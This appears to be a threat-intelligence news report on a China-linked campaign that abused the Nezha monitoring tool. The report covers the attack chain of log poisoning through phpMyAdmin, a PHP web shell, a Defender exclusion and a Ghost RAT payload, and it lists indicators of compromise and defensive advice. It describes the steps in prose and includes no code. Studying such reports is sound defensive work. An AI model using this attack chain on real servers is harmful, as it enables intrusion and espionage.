In a sophisticated cyberattack campaign active since August 2025, a China-linked threat actor has been exploiting the legitimate server operations tool Nezha to execute commands and deploy malware on compromised web servers. This campaign, uncovered by cybersecurity firm Huntress, marks the first publicly reported instance of Nezha being misused in this manner, highlighting a strategic shift towards leveraging open-source tools to evade detection.
Initial Access via Log Poisoning
The attackers initiated their intrusion by exploiting a vulnerable, publicly accessible phpMyAdmin panel that lacked proper authentication mechanisms. After gaining access from an AWS-hosted IP address in Hong Kong, they immediately set the interface language to simplified Chinese, indicating a familiarity with the language and possibly the region.
Employing a technique known as log poisoning, the threat actors manipulated MariaDB’s logging functions to plant a web shell. They configured the general log file to a PHP file within the webroot directory and executed an SQL query containing a one-liner PHP web shell. This method effectively embedded their backdoor into the executable log file, allowing them to execute arbitrary code on the server using tools like AntSword, which are designed to manage such backdoors.
Deployment of Nezha Monitoring Tool
With control established through the web shell, the attackers aimed to deploy a more persistent and versatile tool. They utilized the AntSword connection to download and execute `live.exe`, an installer for a Nezha agent. Nezha is an open-source tool intended for server monitoring and task management. However, in this case, it was repurposed as a malicious implant.
The agent’s configuration file pointed to the attacker’s command-and-control (C2) server, which was running a Nezha dashboard. This dashboard, set to the Russian language, revealed that the attackers had compromised over 100 victim machines across 53 regions, with a significant concentration in East Asia. This pattern aligns with China’s geopolitical interests, suggesting a targeted approach.
Privilege Escalation and Deployment of Ghost RAT
With the Nezha agent providing stable and stealthy access, the attackers escalated their privileges. They used Nezha’s command execution capabilities to launch an interactive PowerShell session, where they created an exclusion rule in Windows Defender to avoid detection. Immediately after, they deployed `x.exe`, a variant of the infamous Ghost RAT. Analysis of this malware revealed communication protocols and persistence mechanisms consistent with previous campaigns attributed to Chinese advanced persistent threat (APT) groups.
Indicators of Compromise (IoCs)
The following IoCs have been identified in this campaign:
– Web Shell:
– File Path: C:\xamp\htdocs\123.php
– SHA256: f3570bb6e0f9c695d48f89f043380b43831dd0f6fe79b16eda2a3ffd9fd7ad16
– Nezha Agent:
– File URL: https://rism.pages[.]dev/microsoft.exe
– File Path: C:\Windows\Cursors\live.exe
– SHA256: 9f33095a24471bed55ce11803e4ebbed5118bfb5d3861baf1c8214efcd9e7de6
– Ghost RAT Payload:
– File Path: C:\Windows\Cursors\x.exe
– SHA256: 7b2599ed54b72daec0acfd32744c7a9a77b19e6cf4e1651837175e4606dbc958
– Renamed rundll32.exe:
– File Path: C:\Windows\system32\SQLlite.exe
– SHA256: 82611e60a2c5de23a1b976bb3b9a32c4427cb60a002e4c27cadfa84031d87999
– Malicious DLL:
– File Path: C:\Windows\system32\32138546.dll
– SHA256: 35e0b22139fb27d2c9721aedf5770d893423bf029e1f56be92485ff8fce210f3
Implications and Recommendations
This incident underscores the necessity of hardening public-facing applications and monitoring for the abuse of legitimate software, as threat actors continue to adapt their playbooks to stay ahead of defenders. Organizations are advised to:
1. Secure Public-Facing Applications: Ensure that applications like phpMyAdmin are properly configured with strong authentication mechanisms to prevent unauthorized access.
2. Monitor for Abuse of Legitimate Tools: Regularly audit the use of legitimate tools within the organization to detect any unauthorized or suspicious activities.
3. Implement Robust Logging and Monitoring: Deploy comprehensive logging and monitoring solutions to detect unusual activities, such as log poisoning attempts or unauthorized command executions.
4. Conduct Regular Security Assessments: Perform periodic security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited by attackers.
By adopting these measures, organizations can enhance their security posture and mitigate the risks associated with such sophisticated cyberattack campaigns.
